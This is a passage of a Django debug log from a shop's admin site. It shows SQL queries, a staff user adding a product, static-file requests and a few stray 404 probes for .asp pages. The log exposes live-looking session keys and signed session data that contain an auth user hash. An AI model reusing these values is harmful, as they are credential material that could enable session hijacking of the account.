'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 12, 6, 12, 40, 9, 906116, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-12-06 12:40:09,918 utils 28908 140676850300672 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [06/Dec/2019 12:40:09] "GET /jsi18n/ HTTP/1.0" 200 3223 [06/Dec/2019 12:40:09] "GET /static/admin/css/forms.css HTTP/1.0" 200 8518 [06/Dec/2019 12:40:10] "GET /static/admin/js/jquery.init.js HTTP/1.0" 200 363 [06/Dec/2019 12:40:10] "GET /static/admin/js/core.js HTTP/1.0" 200 7099 [06/Dec/2019 12:40:10] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.0" 200 271817 [06/Dec/2019 12:40:10] "GET /static/admin/js/actions.js HTTP/1.0" 200 6766 [06/Dec/2019 12:40:10] "GET /static/admin/js/prepopulate.js HTTP/1.0" 200 1530 [06/Dec/2019 12:40:10] "GET /static/admin/js/urlify.js HTTP/1.0" 200 8941 [06/Dec/2019 12:40:10] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 200 6918 [06/Dec/2019 12:40:10] "GET /static/admin/css/widgets.css HTTP/1.0" 200 10340 [06/Dec/2019 12:40:10] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.0" 200 128820 [06/Dec/2019 12:40:10] "GET /static/admin/js/change_form.js HTTP/1.0" 200 712 [06/Dec/2019 12:40:10] "GET /static/admin/js/prepopulate_init.js HTTP/1.0" 200 495 [06/Dec/2019 12:42:40] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-06 12:45:02,034 utils 28908 140676850300672 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:45:02.021681+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 12, 6, 12, 45, 2, 21681, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-12-06 12:45:02,039 utils 28908 140676850300672 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 12:45:02,049 utils 28908 140676850300672 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-06 12:45:02,054 utils 28908 140676850300672 (0.001) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 1 LIMIT 1; args=(1,) DEBUG 2019-12-06 12:45:02,116 utils 28908 140676850300672 (0.001) DECLARE "_django_curs_140676850300672_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-06 12:45:02,175 utils 28908 140676850300672 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T12:45:02.173476+00:00'::timestamptz WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 12, 45, 2, 173476, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') [06/Dec/2019 12:45:02] "POST /shop/product/add/ HTTP/1.0" 200 8341 DEBUG 2019-12-06 12:45:03,005 utils 28908 140676850300672 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:45:02.996664+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 12, 6, 12, 45, 2, 996664, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-12-06 12:45:03,007 utils 28908 140676850300672 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [06/Dec/2019 12:45:03] "GET /jsi18n/ HTTP/1.0" 200 3223 Not Found: /robots.txt [06/Dec/2019 12:47:21] "GET /robots.txt HTTP/1.0" 404 6624 Not Found: /User/User_Favorite.asp [06/Dec/2019 12:47:22] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1002&InfoID=100 HTTP/1.0" 404 6705 Not Found: /newslist.asp [06/Dec/2019 12:47:24] "GET /newslist.asp?type=4&id=1287 HTTP/1.0" 404 6649 [06/Dec/2019 12:47:42] "GET / HTTP/1.0" 302 0 [06/Dec/2019 12:48:07] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-06 12:49:47,162 utils 28908 140676850300672 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:49:47.152849+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 12, 6, 12, 49, 47, 152849, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-12-06 12:49:47,165 utils 28908 140676850300672 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 12:49:47,171 utils 28908 140676850300672 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 1; args=(1,) DEBUG 2019-12-06 12:49:47,174 utils 28908 140676850300672 (0.000) SELECT (1) AS "a" FROM "shop_category" WHERE "shop_category"."id" = 1 LIMIT 1; args=(1,) DEBUG 2019-12-06 12:49:47,186 utils 28908 140676850300672 (0.003) INSERT INTO "shop_product" ("category_id", "name", "slug", "image", "description", "price", "stock", "available", "created", "updated") VALUES (1, 'Aman', 'aman', 'products/2019/12/06/monika-grabkowska-zE6fKdd9QLI-unsplash.jpg', 'aSas', '12', 12, true, '2019-12-06T12:49:47.183495+00:00'::timestamptz, '2019-12-06T12:49:47.183541+00:00'::timestamptz) RETURNING "shop_product"."id"; args=(1, 'Aman', 'aman', 'products/2019/12/06/monika-grabkowska-zE6fKdd9QLI-unsplash.jpg', 'aSas', '12', 12, True, datetime.datetime(2019, 12, 6, 12, 49, 47, 183495, tzinfo=), datetime.datetime(2019, 12, 6, 12, 49, 47, 183541, tzinfo=)) DEBUG 2019-12-06 12:49:47,188 utils 28908 140676850300672 (0.001) INSERT INTO "django_admin_log" ("action_time", "user_id", "content_type_id", "object_id", "object_repr", "action_flag", "change_message") VALUES ('2019-12-06T12:49:47.187135+00:00'::timestamptz, 6, 9, '2', 'Aman', 1, '[{"added": {}}]') RETURNING "django_admin_log"."id"; args=(datetime.datetime(2019, 12, 6, 12, 49, 47, 187135, tzinfo=), 6, 9, '2', 'Aman', 1, '[{"added": {}}]') [06/Dec/2019 12:49:47] "POST /shop/product/add/ HTTP/1.0" 302 0 DEBUG 2019-12-06 12:49:47,556 utils 28908 140676850300672 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:49:47.542101+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 12, 6, 12, 49, 47, 542101, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-12-06 12:49:47,560 utils 28908 140676850300672 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 12:49:47,567 utils 28908 140676850300672 (0.003) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-06 12:49:47,568 utils 28908 140676850300672 (0.001) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-06 12:49:47,575 utils 28908 140676850300672 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC; args=() DEBUG 2019-12-06 12:49:47,761 utils 28908 140676850300672 (0.002) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T12:49:47.758293+00:00'::timestamptz WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 12, 49, 47, 758293, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') [06/Dec/2019 12:49:47] "GET /shop/product/ HTTP/1.0" 200 9381 [06/Dec/2019 12:49:48] "GET /static/admin/css/changelists.css HTTP/1.0" 200 6170 DEBUG 2019-12-06 12:49:48,505 utils 28908 140676850300672 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:49:48.489424+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 12, 6, 12, 49, 48, 489424, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-12-06 12:49:48,509 utils 28908 140676850300672 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [06/Dec/2019 12:49:48] "GET /jsi18n/ HTTP/1.0" 200 3223 [06/Dec/2019 12:49:49] "GET /static/admin/img/icon-yes.svg HTTP/1.0" 200 436 [06/Dec/2019 12:49:49] "GET /static/admin/img/tooltag-add.svg HTTP/1.0" 200 331 [06/Dec/2019 12:49:49] "GET /static/admin/img/sorting-icons.svg HTTP/1.0" 200 1097 DEBUG 2019-12-06 12:50:04,177 utils 28908 140676850300672 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:50:04.162159+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 12, 6, 12, 50, 4, 162159, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-12-06 12:50:04,183 utils 28908 140676850300672 (0.003) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 12:50:04,189 utils 28908 140676850300672 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 2; args=(2,) DEBUG 2019-12-06 12:50:04,265 utils 28908 140676850300672 (0.003) DECLARE "_django_curs_140676850300672_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-06 12:50:04,326 utils 28908 140676850300672 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T12:50:04.324363+00:00'::timestamptz WHERE "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 12, 50, 4, 324363, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') [06/Dec/2019 12:50:04] "GET /shop/product/2/change/ HTTP/1.0" 200 8734 DEBUG 2019-12-06 12:50:04,928 utils 28908 140676850300672 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:50:04.919550+00:00'::timestamptz AND "django_session"."session_key" = 'd7pf9z12rq486ubfvq2gsrikii6tex3m'); args=(datetime.datetime(2019, 12, 6, 12, 50, 4, 919550, tzinfo=), 'd7pf9z12rq486ubfvq2gsrikii6tex3m') DEBUG 2019-12-06 12:50:04,931 utils 28908 140676850300672 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [06/Dec/2019 12:50:04] "GET /jsi18n/ HTTP/1.0" 200 3223 [06/Dec/2019 12:50:05] "GET /static/admin/img/tooltag-arrowright.svg HTTP/1.0" 200 280 DEBUG 2019-12-06 12:50:15,355 utils 28908 140676850300672 (0.004) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:50:15.344132+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 12, 50, 15, 344132, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 12:50:15,359 utils 28908 140676850300672 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 12:50:15,400 utils 28908 140676850300672 (0.004) SELECT "django_admin_log"."id", "django_admin_log"."action_time", "django_admin_log"."user_id", "django_admin_log"."content_type_id", "django_admin_log"."object_id", "django_admin_log"."object_repr", "django_admin_log"."action_flag", "django_admin_log"."change_message", "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined", "django_content_type"."id", "django_content_type"."app_label", "django_content_type"."model" FROM "django_admin_log" INNER JOIN "auth_user" ON ("django_admin_log"."user_id" = "auth_user"."id") LEFT OUTER JOIN "django_content_type" ON ("django_admin_log"."content_type_id" = "django_content_type"."id") WHERE "django_admin_log"."user_id" = 6 ORDER BY "django_admin_log"."action_time" DESC LIMIT 10; args=(6,) DEBUG 2019-12-06 12:50:15,410 utils 28908 140676850300672 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T12:50:15.407080+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 12, 50, 15, 407080, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [06/Dec/2019 12:50:15] "GET / HTTP/1.0" 200 7169 [06/Dec/2019 12:50:15] "GET /static/admin/css/dashboard.css HTTP/1.0" 304 0 [06/Dec/2019 12:50:16] "GET /static/admin/css/responsive.css HTTP/1.0" 304 0 [06/Dec/2019 12:50:16] "GET /static/admin/css/base.css HTTP/1.0" 304 0 [06/Dec/2019 12:50:16] "GET /static/admin/css/fonts.css HTTP/1.0" 304 0 [06/Dec/2019 12:50:16] "GET /static/admin/img/icon-addlink.svg HTTP/1.0" 304 0 [06/Dec/2019 12:50:16] "GET /static/admin/img/icon-changelink.svg HTTP/1.0" 304 0 [06/Dec/2019 12:50:16] "GET /static/admin/fonts/Roboto-Regular-webfont.woff HTTP/1.0" 304 0 [06/Dec/2019 12:50:16] "GET /static/admin/fonts/Roboto-Bold-webfont.woff HTTP/1.0" 304 0 [06/Dec/2019 12:50:16] "GET /static/admin/fonts/Roboto-Light-webfont.woff HTTP/1.0" 304 0 DEBUG 2019-12-06 12:50:19,959 utils 28908 140676850300672 (0.005) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:50:19.945068+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 12, 50, 19, 945068, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 12:50:19,963 utils 28908 140676850300672 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 12:50:19,969 utils 28908 140676850300672 (0.002) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-06 12:50:19,971 utils 28908 140676850300672 (0.000) SELECT COUNT(*) AS "__count" FROM "shop_product"; args=() DEBUG 2019-12-06 12:50:19,978 utils 28908 140676850300672 (0.002) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" ORDER BY "shop_product"."name" ASC, "shop_product"."id" DESC; args=() DEBUG 2019-12-06 12:50:20,159 utils 28908 140676850300672 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T12:50:20.156079+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; args=('YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', datetime.datetime(2019, 12, 20, 12, 50, 20, 156079, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [06/Dec/2019 12:50:20] "GET /shop/product/ HTTP/1.0" 200 9209 [06/Dec/2019 12:50:20] "GET /static/admin/css/forms.css HTTP/1.0" 304 0 [06/Dec/2019 12:50:20] "GET /static/admin/css/changelists.css HTTP/1.0" 304 0 [06/Dec/2019 12:50:20] "GET /static/admin/js/jquery.init.js HTTP/1.0" 304 0 DEBUG 2019-12-06 12:50:20,490 utils 28908 140676850300672 (0.006) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:50:20.475928+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 12, 50, 20, 475928, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') [06/Dec/2019 12:50:20] "GET /static/admin/js/core.js HTTP/1.0" 304 0 DEBUG 2019-12-06 12:50:20,494 utils 28908 140676850300672 (0.002) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) [06/Dec/2019 12:50:20] "GET /jsi18n/ HTTP/1.0" 200 3223 [06/Dec/2019 12:50:20] "GET /static/admin/js/vendor/xregexp/xregexp.js HTTP/1.0" 304 0 [06/Dec/2019 12:50:20] "GET /static/admin/js/admin/RelatedObjectLookups.js HTTP/1.0" 304 0 [06/Dec/2019 12:50:20] "GET /static/admin/js/actions.js HTTP/1.0" 304 0 [06/Dec/2019 12:50:20] "GET /static/admin/js/prepopulate.js HTTP/1.0" 304 0 [06/Dec/2019 12:50:20] "GET /static/admin/js/vendor/jquery/jquery.js HTTP/1.0" 304 0 [06/Dec/2019 12:50:20] "GET /static/admin/js/urlify.js HTTP/1.0" 304 0 [06/Dec/2019 12:50:20] "GET /static/admin/css/widgets.css HTTP/1.0" 304 0 [06/Dec/2019 12:50:21] "GET /static/admin/img/tooltag-add.svg HTTP/1.0" 304 0 [06/Dec/2019 12:50:21] "GET /static/admin/img/sorting-icons.svg HTTP/1.0" 304 0 DEBUG 2019-12-06 12:50:25,028 utils 28908 140676876654336 (0.003) SELECT "django_session"."session_key", "django_session"."session_data", "django_session"."expire_date" FROM "django_session" WHERE ("django_session"."expire_date" > '2019-12-06T12:50:25.018648+00:00'::timestamptz AND "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'); args=(datetime.datetime(2019, 12, 6, 12, 50, 25, 18648, tzinfo=), 'g6b5kylaf4glm3mfb70u6becl9zozzh3') DEBUG 2019-12-06 12:50:25,030 utils 28908 140676876654336 (0.001) SELECT "auth_user"."id", "auth_user"."password", "auth_user"."last_login", "auth_user"."is_superuser", "auth_user"."username", "auth_user"."first_name", "auth_user"."last_name", "auth_user"."email", "auth_user"."is_staff", "auth_user"."is_active", "auth_user"."date_joined" FROM "auth_user" WHERE "auth_user"."id" = 6; args=(6,) DEBUG 2019-12-06 12:50:25,034 utils 28908 140676876654336 (0.001) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE "shop_product"."id" = 2; args=(2,) DEBUG 2019-12-06 12:50:25,082 utils 28908 140676876654336 (0.002) DECLARE "_django_curs_140676876654336_1" NO SCROLL CURSOR WITH HOLD FOR SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-06 12:50:25,139 utils 28908 140676876654336 (0.001) UPDATE "django_session" SET "session_data" = 'YmNiY2ZhZTUzZGVhYjFmODRlNDI1MGI4YmViODkyNTg3MmRlODZlYjp7ImNhcnQiOnt9LCJfYXV0aF91c2VyX2lkIjoiNiIsIl9hdXRoX3VzZXJfYmFja2VuZCI6ImRqYW5nby5jb250cmliLmF1dGguYmFja2VuZHMuTW9kZWxCYWNrZW5kIiwiX2F1dGhfdXNlcl9oYXNoIjoiYWEwN2ZlZGRkMjAxYjdmNWQwNDdhODBhZTA5ZmY2MTg0NzIxMjkyYiJ9', "expire_date" = '2019-12-20T12:50:25.137491+00:00'::timestamptz WHERE "django_session"."session_key" = 'g6b5kylaf4glm3mfb70u6becl9zozzh3'; 